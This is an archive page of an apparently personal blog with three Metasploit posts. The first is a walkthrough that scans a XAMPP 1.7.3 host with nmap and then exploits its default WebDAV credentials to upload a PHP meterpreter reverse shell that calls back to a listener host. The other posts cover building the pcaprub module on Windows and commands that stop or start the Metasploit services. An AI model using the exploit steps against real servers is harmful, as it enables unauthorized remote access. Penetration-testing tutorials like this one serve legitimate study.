Archive

Posts Tagged ‘Metasploit’

Exploit XMAPP With Metasploit Framework

Czerwiec 29, 2012 1 komentarz

XMAPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

The distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

xampp_for_win

XAMPP For Windows

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf >use exploit(xampp_webdav_upload_php)

msf>set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf  exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

xampp exploit

Xampp Exploit

We’re home.

Source:

Metasploit – How To install Pcaprub For Windows

Maj 31, 2012 1 komentarz

While using Metasploit 3 console and trying to use the auxiliary ipidseq scanner module I get the following error message:

The Pcaprub module is not available: no such file to load — pcaprub
[-] Auxiliary failed: RuntimeError Pcaprub not available
[-] Call stack:

Ho to install Pcapruby for Windows  ( Windows 7 ) :

  •     Install latest msf3 either through installer or (tortoise) svn, the ruby shipped with msf3 installer will not be used for this test
  •     Update msf3 to at least version  – ( svn update )
  •     Unzip it to c:\ to have C:\WpdPack\Include, C:\WpdPack\Lib , ….
  •     copy this file in c:\devkit and extract here
  •     launch your command prompt and cd c:\devkit
  •     launch devkitvars.bat
  •     ruby dk.rb init
  •     ruby dk.rb install
  •     cd …../msf3/external/pcaprub
  •     ruby extconf.rb
  •     make
  •     make install
  •     ruby test_pcaprub.rb
  • copy c:\Ruby193\lib\ruby\site_ruby\1.9.1\i386-msvcrt\pcaprub.so to c:\Program Files (x86)\Rapid7\framework\ruby\lib\ruby\site_ruby\1.9.1\i386-msvcrt\

Microsoft Windows [Wersja 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation. Wszelkie prawa zastrzeżone.

c:\devkit>dir
 Wolumin w stacji C nie ma etykiety.
 Numer seryjny woluminu: FE45-9B53

Katalog: c:\devkit
 c:\devkit>dir *.bat
 Wolumin w stacji C nie ma etykiety.
 Numer seryjny woluminu: FE45-9B53

Katalog: c:\devkit

2010-12-14  21:00               297 devkitvars.bat
 2010-09-29  01:48             7 167 msys.bat
 2 plik(ów)              7 464 bajtów
 0 katalog(ów)  93 853 249 536 bajtów wolnych

c:\devkit>devkitvars.bat
 Adding the DevKit to PATH...

c:\devkit>ruby dk.rb init
 [INFO] found RubyInstaller v1.9.3 at C:/Ruby193

Initialization complete! Please review and modify the auto-generated
 'config.yml' file to ensure it contains the root directories to all
 of the installed Rubies you want enhanced by the DevKit.

c:\devkit>ruby dk.rb install
 [INFO] Updating convenience notice gem override for 'C:/Ruby193'
 [INFO] Installing 'C:/Ruby193/lib/ruby/site_ruby/devkit.rb'

c:\devkit>cd c:\programs files (x86)
 System nie może odnaleźć określonej ścieżki.

c:\devkit>cd ..

c:\>cd Programs Files (x86)
 System nie może odnaleźć określonej ścieżki.

c:\>cd Program Files (x86)

c:\Program Files (x86)>cd Rapid7

c:\Program Files (x86)\Rapid7>cd framework

c:\Program Files (x86)\Rapid7\framework>cd msf3

c:\Program Files (x86)\Rapid7\framework\msf3>cd external

c:\Program Files (x86)\Rapid7\framework\msf3\external>cd pcaprub

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>ruby extconf.rb
 platform is i386-mingw32

[*] Running checks for netifaces code added by metasploit project
 -----------------------------------------------------------------
 checking for main() in -lws2_32... yes
 checking for main() in -liphlpapi... yes
 checking for windows.h... yes
 checking for winsock2.h... yes
 checking for iphlpapi.h... yes

[*] Running checks for pcap code...
 -----------------------------------
 checking for pcap_open_live() in -lwpcap... yes
 checking for pcap_setnonblock() in -lwpcap... yes
 creating Makefile

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>make
 generating pcaprub-i386-mingw32.def
 compiling netifaces.c
 netifaces.c: In function 'add_to_family':
 netifaces.c:194:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c: In function 'rbnetifaces_s_addresses':
 netifaces.c:213:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:218:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:261:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:266:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:279:4: warning: ISO C90 forbids mixed declarations and code
 netifaces.c: In function 'rbnetifaces_s_interfaces':
 netifaces.c:545:2: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:588:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:590:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c: In function 'rbnetifaces_s_interface_info':
 netifaces.c:753:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:763:3: warning: ISO C90 forbids mixed declarations and code
 netifaces.c:775:3: warning: ISO C90 forbids mixed declarations and code
 compiling pcaprub.c
 In file included from C:/WpdPack/include/pcap/pcap.h:41:0,
 from C:/WpdPack/include/pcap.h:45,
 from pcaprub.c:9:
 C:/WpdPack/include/pcap-stdinc.h:64:0: warning: "snprintf" redefined
 c:/Ruby193/include/ruby-1.9.1/ruby/subst.h:6:0: note: this is the location of th
 e previous definition
 C:/WpdPack/include/pcap-stdinc.h:65:0: warning: "vsnprintf" redefined
 c:/Ruby193/include/ruby-1.9.1/ruby/subst.h:7:0: note: this is the location of th
 e previous definition
 linking shared-object pcaprub.so

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>make install
 /usr/bin/install -c -m 0755 pcaprub.so C:/Ruby193/lib/ruby/site_ruby/1.9.1/i386-
 msvcrt
 installing default pcaprub libraries

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>ruby test_pcaprub.
 rb
 Run options:

# Running tests:

Pcaprub default device: \Device\NPF_{FC3FE7B3-21B1-410F-AAFD-57F5E62EFDB3}
 .Pcaprub net (\Device\NPF_{FC3FE7B3-21B1-410F-AAFD-57F5E62EFDB3}): 192.168.0.0 f
 fffff00
 .AF_LINK Value is -1000
 AF_INET Value is 2
 AF_INET6 Value is 23
 .\Device\NPF_{14ED440E-E5BE-4290-852A-073A7BD7E251} :
 -1000 :
 addr : 22:24:2c:0b:07:33

2 :
 addr : 0.0.0.0
 netmask : 0.0.0.0
 broadcast : 255.255.255.255

\Device\NPF_{271276FF-FBEE-4113-98FA-BF770EB76C38} :
 -1000 :
 addr : 00:23:8b:9b:d9:4b

2 :
 addr : 0.0.0.0
 netmask : 0.0.0.0
 broadcast : 255.255.255.255

\Device\NPF_{4AB0E7A8-ED96-40C8-9F7E-D78933F02405} :
 -1000 :
 addr : 00:50:56:c0:00:01

2 :
 addr : 192.168.64.1
 netmask : 255.255.255.0
 broadcast : 192.168.64.255

\Device\NPF_{9B1AD6F8-0BD9-4EE0-A2EC-64403CB51B4A} :
 -1000 :
 addr : 00:50:56:c0:00:08

2 :
 addr : 192.168.180.1
 netmask : 255.255.255.0
 broadcast : 192.168.180.255

\Device\NPF_{B8CD3325-6221-4AFC-A3EB-B1BD363D3BE2} :
 -1000 :
 addr : 00:24:2c:0b:07:33

2 :
 addr : 0.0.0.0
 netmask : 0.0.0.0
 broadcast : 255.255.255.255

\Device\NPF_{F65076A9-A7F1-4357-A08A-804E694187DC} :
 -1000 :
 addr : 08:00:27:00:c4:35

2 :
 addr : 192.168.56.1
 netmask : 255.255.255.0
 broadcast : 192.168.56.255

\Device\NPF_{FC3FE7B3-21B1-410F-AAFD-57F5E62EFDB3} :
 -1000 :
 addr : 80:00:60:0f:e8:00

2 :
 addr : 192.168.0.102
 netmask : 255.255.255.0
 broadcast : 192.168.0.255

....E....Pcaprub version: 0.9-dev
 .

Finished tests in 7.899207s, 1.6457 tests/s, 1.2659 assertions/s.

1) Error:
 test_pcap_next(Pcap::UnitTest):
 Errno::EBADF: Bad file descriptor
 test_pcaprub.rb:93:in `each'
 test_pcaprub.rb:93:in `block in test_pcap_next'

13 tests, 10 assertions, 0 failures, 1 errors, 0 skips

c:\Program Files (x86)\Rapid7\framework\msf3\external\pcaprub>

Kategorie:Metasploit Tags:

Disable Metasploit / Enable Metasploit in windows.

Marzec 20, 2012 Dodaj komentarz

Disable Metasploit / Enable Metasploit in windows.

Disable stop script

 net stop "Metasploit Pro Service"
 net stop "Metasploit Thin Service"
 net stop metasploitPostgreSQL
 sc config metasploitProSvc   start= disabled
 sc config metasploitThin  start= disabled
 sc config metasploitPostgreSQL  start= disabled

Enable start script

 sc config metasploitProSvc   start= auto
 sc config metasploitThin  start= auto
 sc config metasploitPostgreSQL  start= auto
 net start "Metasploit Pro Service"
 net start "Metasploit Thin Service"
 net start metasploitPostgreSQL
 
Kategorie:Metasploit Tags: